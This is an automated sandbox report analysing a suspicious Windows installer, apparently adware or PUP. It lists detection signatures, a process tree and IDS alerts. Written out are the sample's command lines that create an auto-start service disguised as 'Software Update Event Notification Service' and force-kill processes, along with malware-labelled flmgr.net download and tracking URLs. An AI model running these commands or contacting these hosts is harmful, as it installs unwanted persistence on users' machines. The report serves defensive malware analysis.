Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
_____NCM______2_10042231.exe

Overview

General Information

Sample Name:_____NCM______2_10042231.exe
Analysis ID:1285857
MD5:ea6810e51b21867f42c2dc3c485ef68e
SHA1:dd2732626c4512ff161f76b9f08f56f5027dec0a
SHA256:6385d6449f490e42e0f37346abe0e098846b38a210e46b66cc51c1e56414e289
Infos:

Detection

Score:42
Range:0 - 100
Whitelisted:false
Confidence:100%

Compliance

Score:18
Range:0 - 100

Signatures

Antivirus detection for URL or domain
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Found stalling execution ending in API Sleep call
DLL side loading technique detected
Hides threads from debuggers
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
EXE planting / hijacking vulnerabilities found
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Checks for debuggers (devices)
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
AV process strings found (often used to terminate AV products)
PE file does not import any functions
DLL planting / hijacking vulnerabilities found
Sample file is different than original file name gathered from version info
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains capabilities to detect virtual machines
Uses taskkill to terminate processes
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Contains functionality to query network adapater information

Classification

  • System is w10x64
  • _____NCM______2_10042231.exe (PID: 3156 cmdline: C:\Users\user\Desktop\_____NCM______2_10042231.exe MD5: EA6810E51B21867F42C2DC3C485EF68E)
    • sc.exe (PID: 4404 cmdline: sc stop SoftUpdateSrv MD5: 24A3E2603E63BCB9695A2935D3B24695)
      • conhost.exe (PID: 5808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • sc.exe (PID: 5724 cmdline: sc delete SoftUpdateSrv MD5: 24A3E2603E63BCB9695A2935D3B24695)
      • conhost.exe (PID: 5056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • taskkill.exe (PID: 5748 cmdline: taskkill /f /im winManager.exe MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
      • conhost.exe (PID: 5380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • taskkill.exe (PID: 5300 cmdline: taskkill /f /im FLMgrUpdate.exe MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
      • conhost.exe (PID: 5368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • taskkill.exe (PID: 3808 cmdline: taskkill /f /im FLMgrTray.exe MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
      • conhost.exe (PID: 4832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • explorer.exe (PID: 6596 cmdline: C:\Windows\System32\explorer.exe" /select,"C:\Users\user\Desktop\wyyyyncmwjzh.rar MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
    • sc.exe (PID: 6540 cmdline: sc CREATE SoftUpdateSrv type= own start= auto DisplayName= "Software Update Event Notification Service" binPath= "C:\Users\user\AppData\Local\winManager\FLServer.exe" MD5: 24A3E2603E63BCB9695A2935D3B24695)
      • conhost.exe (PID: 6636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • sc.exe (PID: 6616 cmdline: sc description SoftUpdateSrv "???????????" MD5: 24A3E2603E63BCB9695A2935D3B24695)
      • conhost.exe (PID: 6668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • FLMgrTray.exe (PID: 5852 cmdline: C:\Users\user\AppData\Local\winManager\FLMgrTray.exe MD5: D17DDD41E804496F5077958A93D8843B)
    • sc.exe (PID: 1652 cmdline: sc start SoftUpdateSrv MD5: 24A3E2603E63BCB9695A2935D3B24695)
      • conhost.exe (PID: 6036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • explorer.exe (PID: 6748 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • FLServer.exe (PID: 3320 cmdline: C:\Users\user\AppData\Local\winManager\FLServer.exe MD5: 163745C2E7DF57C29533FE4CC8F574BF)
    • FLMgrTray.exe (PID: 1536 cmdline: MD5: D17DDD41E804496F5077958A93D8843B)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
Timestamp:192.168.2.3123.57.49.3649740802007929 08/04/23-18:30:21.951107
SID:2007929
Source Port:49740
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:192.168.2.3218.12.76.15849750802007929 08/04/23-18:31:30.109837
SID:2007929
Source Port:49750
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:192.168.2.360.205.148.17849756802007929 08/04/23-18:31:41.374862
SID:2007929
Source Port:49756
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:192.168.2.3123.57.49.3649744802007929 08/04/23-18:30:47.065887
SID:2007929
Source Port:49744
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:192.168.2.360.205.148.17849761802007929 08/04/23-18:31:57.572608
SID:2007929
Source Port:49761
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:192.168.2.3123.57.49.3649752802007929 08/04/23-18:31:34.887978
SID:2007929
Source Port:49752
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:192.168.2.343.159.200.21249762802007929 08/04/23-18:31:58.949503
SID:2007929
Source Port:49762
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:192.168.2.3218.12.76.15849751802007929 08/04/23-18:31:30.087059
SID:2007929
Source Port:49751
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: http://static.flmgr.net/green/1.0.6.2.pngAvira URL Cloud: Label: malware
Source: http://api.flmgr.net/log/client/site_soft?Action=down_start&User=e3c4aca4bf472f3bc70d155d55d5bb2f&ChannelCode=2&Ver=1.0.7.17&OsVer=10.0&Sdsoft=0&Softid=10042231&Filename=_____NCM______2_10042231.exe&Checks=1&Err=0Avira URL Cloud: Label: malware
Source: http://api.flmgr.net/log/client/site_softhttp://api.flmgr.net/log/client/installAvira URL Cloud: Label: malware
Source: http://api.flmgr.net/v1/api/systemAvira URL Cloud: Label: malware
Source: http://api.flmgr.net/log/client/install?Action=suc&User=e3c4aca4bf472f3bc70d155d55d5bb2f&ChannelCodeAvira URL Cloud: Label: malware
Source: http://api.flmgr.net/v1/client/soft/find_keyname?SoftID=%d/taskidcurrentspeedremaintimestatuscodedowAvira URL Cloud: Label: malware
Source: http://api.flmgr.net/log/client/run?User=e3c4aca4bf472f3bc70d155d55d5bb2f&InstallDate=2023-08-04&ChannelCode=2&Ver=1.0.7.17&StartMode=0&OsVer=10.0&Action=runkit&step=1&Intact=1&Miss=&RunMode=0&UserEv=0&Sdsoft=0Avira URL Cloud: Label: malware
Source: http://api.flmgr.net/v1/client/configs50Avira URL Cloud: Label: malware
Source: https://gstararch.gstarcad.cn/2023/2D/230529/GstarCAD2023_ZH_x64.exeAvira URL Cloud: Label: phishing
Source: http://static.flmgr.net/green/1.2.3Avira URL Cloud: Label: malware
Source: http://client.flmgr.net/home/recommend?taskbar_closegetAvira URL Cloud: Label: malware
Source: http://www.flmgr.net/win_agreement.htmlAvira URL Cloud: Label: malware
Source: http://www.flmgr.net/win_fl_agreement.htmlRptMain.xml_USERPROFILEGeneralDisplayNameSoftidWebidSdsoftAvira URL Cloud: Label: malware
Source: http://api.flmgr.net/log/client/stay?User=%s&InstallDate=%s&Ver=%s&ChannelCode=%s&RunTime=%d&Module=Avira URL Cloud: Label: malware
Source: http://api.flmgr.net/eAvira URL Cloud: Label: malware
Source: http://api.flmgr.net/v1/client/theme?User=e3c4aca4bf472f3bc70d155d55d5bb2f&Ver=1.0.7.17&Winver=10.0&Avira URL Cloud: Label: malware
Source: http://static-img.flmgr.net/20230717170650.pngAvira URL Cloud: Label: malware
Source: http://api.flmgr.net/mAvira URL Cloud: Label: malware
Source: http://api.flmgr.net/log/client/site_soft?Action=down_suc&User=e3c4aca4bf472f3bc70d155d55d5bb2f&ChannelCode=2&Ver=1.0.7.17&OsVer=10.0&Sdsoft=0&Softid=10042231&Filename=_____NCM______2_10042231.exe&Checks=1&Err=0Avira URL Cloud: Label: malware
Source: http://api.flmgr.net/log/client/install?Action=open&User=e3c4aca4bf472f3bc70d155d55d5bb2f&ChannelCode=2&Ver=1.0.7.17&OsVer=10.0&Sdsoft=0&Softid=10042231&Filename=_____NCM______2_10042231.exe&IsUpdgade=0&OldVer=Avira URL Cloud: Label: malware
Source: http://api.flmgr.net/4ADAvira URL Cloud: Label: malware
Source: http://static.flmgr.net/kit/KitTip.dllAvira URL Cloud: Label: malware
Source: http://api.flmgr.net/log/client/install?Action=suc&User=e3c4aca4bf472f3bc70d155d55d5bb2f&ChannelCode=2&Ver=1.0.7.17&OsVer=10.0&Sdsoft=0&Softid=10042231&Filename=_____NCM______2_10042231.exe&IsUpdgade=0&OldVer=Avira URL Cloud: Label: malware
Source: http://api.flmgr.net/v1/client/extspAvira URL Cloud: Label: malware
Source: http://api.flmgr.net:80/v1/client/extsAvira URL Cloud: Label: malware
Source: http://static-img.flmgr.net/20230713170812.pngAvira URL Cloud: Label: malware
Source: _____NCM______2_10042231.exeReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\winManager\FLServer.exeJoe Sandbox ML: detected
Source: _____NCM______2_10042231.exe, 00000000.00000000.369683496.0000000000811000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeEXE: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeEXE: C:\Users\user\AppData\Local\winManager\FLPdfTrans.exeJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeEXE: C:\Users\user\AppData\Local\winManager\CrashSender.exeJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeEXE: C:\Users\user\AppData\Local\winManager\winLead.exeJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeEXE: sc.exeJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeEXE: C:\Users\user\AppData\Local\winManager\FLServer.exeJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeEXE: C:\Users\user\AppData\Local\winManager\FLExt.exeJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeEXE: C:\Users\user\AppData\Local\winManager\leave.exeJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeEXE: taskkill.exeJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeEXE: C:\Users\user\AppData\Local\winManager\winManager.exeJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeEXE: C:\Users\user\AppData\Local\winManager\FLMgrUpdate.exeJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: LINKINFO.dllJump to behavior
Source: C:\Users\user\AppData\Local\winManager\FLServer.exeDLL: WINSTA.dll
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: WINHTTP.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: WINMM.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\node.dllJump to behavior
Source: C:\Users\user\AppData\Local\winManager\FLServer.exeDLL: bcrypt.dll
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-core-string-l1-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-core-rtlsupport-l1-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\libssl-1_1.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: dwmapi.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-core-file-l1-2-0.dllJump to behavior
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeDLL: WININET.dll
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\jsoncpp.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-core-memory-l1-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-core-heap-l1-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-core-processthreads-l1-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-core-processenvironment-l1-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\imgdecoder-png.dllJump to behavior
Source: C:\Users\user\AppData\Local\winManager\FLServer.exeDLL: urlmon.dll
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\utilities.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\ucrtbase.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: WINMMBASE.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\API-MS-Win-core-xstate-l2-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-core-fibers-l1-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-crt-environment-l1-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-core-datetime-l1-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\soui3.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: ntshrui.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-core-interlocked-l1-1-0.dllJump to behavior
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeDLL: winbrand.dll
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-core-handle-l1-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\DuiLib.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\imgdecoder-gdip.dllJump to behavior
Source: C:\Users\user\AppData\Local\winManager\FLServer.exeDLL: USERENV.dll
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: webio.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\msvcp120.dllJump to behavior
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeDLL: DPAPI.DLL
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-core-profile-l1-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-crt-convert-l1-1-0.dllJump to behavior
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeDLL: DEVRTL.dll
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeDLL: IPHLPAPI.DLL
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-core-util-l1-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-crt-locale-l1-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-crt-runtime-l1-1-0.dllJump to behavior
Source: C:\Users\user\AppData\Local\winManager\FLServer.exeDLL: iertutil.dll
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-core-console-l1-2-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: UxTheme.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-crt-filesystem-l1-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-crt-heap-l1-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: DWrite.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-core-namedpipe-l1-1-0.dllJump to behavior
Source: C:\Users\user\AppData\Local\winManager\FLServer.exeDLL: WTSAPI32.dll
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\libcrypto-1_1.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-core-console-l1-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\soui-sys-resource.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-crt-process-l1-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-crt-stdio-l1-1-0.dllJump to behavior
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeDLL: CRYPTSP.dll
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-core-debug-l1-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\render-skia.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-crt-math-l1-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-core-errorhandling-l1-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\zlib1.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-core-localization-l1-2-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-core-timezone-l1-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: winnlsres.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-core-sysinfo-l1-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-core-processthreads-l1-1-1.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-crt-private-l1-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\libcurl.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-core-file-l2-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-crt-time-l1-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-core-synch-l1-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\resprovider-zip.dllJump to behavior
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeDLL: MSIMG32.dll
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: PROPSYS.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-crt-multibyte-l1-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: Msftedit.dllJump to behavior
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeDLL: VERSION.dll
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: cscapi.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\CrashRpt.dllJump to behavior
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeDLL: Cabinet.dll
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-core-libraryloader-l1-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-crt-conio-l1-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-crt-utility-l1-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\msvcr120.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\zlibwapi.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\concrt140.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-crt-string-l1-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\libqpdf.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: OLEACC.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: CoreMessaging.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-core-file-l1-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\msvcp140.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: WindowsCodecs.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: CLDAPI.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-core-synch-l1-2-0.dllJump to behavior

Compliance

barindex
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeEXE: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeEXE: C:\Users\user\AppData\Local\winManager\FLPdfTrans.exeJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeEXE: C:\Users\user\AppData\Local\winManager\CrashSender.exeJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeEXE: C:\Users\user\AppData\Local\winManager\winLead.exeJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeEXE: sc.exeJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeEXE: C:\Users\user\AppData\Local\winManager\FLServer.exeJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeEXE: C:\Users\user\AppData\Local\winManager\FLExt.exeJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeEXE: C:\Users\user\AppData\Local\winManager\leave.exeJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeEXE: taskkill.exeJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeEXE: C:\Users\user\AppData\Local\winManager\winManager.exeJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeEXE: C:\Users\user\AppData\Local\winManager\FLMgrUpdate.exeJump to behavior
Source: _____NCM______2_10042231.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: LINKINFO.dllJump to behavior
Source: C:\Users\user\AppData\Local\winManager\FLServer.exeDLL: WINSTA.dll
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: WINHTTP.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: WINMM.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\node.dllJump to behavior
Source: C:\Users\user\AppData\Local\winManager\FLServer.exeDLL: bcrypt.dll
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-core-string-l1-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-core-rtlsupport-l1-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\libssl-1_1.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: dwmapi.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-core-file-l1-2-0.dllJump to behavior
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeDLL: WININET.dll
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\jsoncpp.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-core-memory-l1-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-core-heap-l1-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-core-processthreads-l1-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-core-processenvironment-l1-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\imgdecoder-png.dllJump to behavior
Source: C:\Users\user\AppData\Local\winManager\FLServer.exeDLL: urlmon.dll
